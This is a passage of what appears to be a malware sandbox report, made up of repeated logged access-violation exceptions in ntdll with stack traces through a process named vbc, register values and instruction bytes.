ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633024 registers.edi: 1633112 registers.eax: 23117 registers.ebp: 1633084 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7756f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7756f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7758176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633148 registers.edi: 1633244 registers.eax: 23117 registers.ebp: 1633208 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2002365952	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7757317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x7758199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x7758193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633040 registers.edi: 1633128 registers.eax: 23117 registers.ebp: 1633100 registers.edx: 0 registers.ebx: 0 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7756f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7756f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7758176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7759af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1632892 registers.edi: 1632988 registers.eax: 23117 registers.ebp: 1632952 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2002262528	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7757317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7759ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7759af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633024 registers.edi: 1633112 registers.eax: 23117 registers.ebp: 1633084 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7756f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7756f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7758176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633148 registers.edi: 1633244 registers.eax: 23117 registers.ebp: 1633208 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2002365952	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7757317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x7758199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x7758193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633040 registers.edi: 1633128 registers.eax: 23117 registers.ebp: 1633100 registers.edx: 0 registers.ebx: 0 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7756f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7756f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7758176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7759af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1632892 registers.edi: 1632988 registers.eax: 23117 registers.ebp: 1632952 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2002262528	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7757317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7759ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7759af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633024 registers.edi: 1633112 registers.eax: 23117 registers.ebp: 1633084 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7756f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7756f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7758176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633148 registers.edi: 1633244 registers.eax: 23117 registers.ebp: 1633208 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2002365952	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7757317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x7758199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x7758193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633040 registers.edi: 1633128 registers.eax: 23117 registers.ebp: 1633100 registers.edx: 0 registers.ebx: 0 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7756f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7756f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7758176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7759af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1632892 registers.edi: 1632988 registers.eax: 23117 registers.ebp: 1632952 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2002262528	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7757317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7759ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7759af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633024 registers.edi: 1633112 registers.eax: 23117 registers.ebp: 1633084 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7756f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7756f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7758176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633148 registers.edi: 1633244 registers.eax: 23117 registers.ebp: 1633208 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2002365952	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7757317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x7758199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x7758193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633040 registers.edi: 1633128 registers.eax: 23117 registers.ebp: 1633100 registers.edx: 0 registers.ebx: 0 registers.esi: 6094848 registers.ecx: 1633024	1
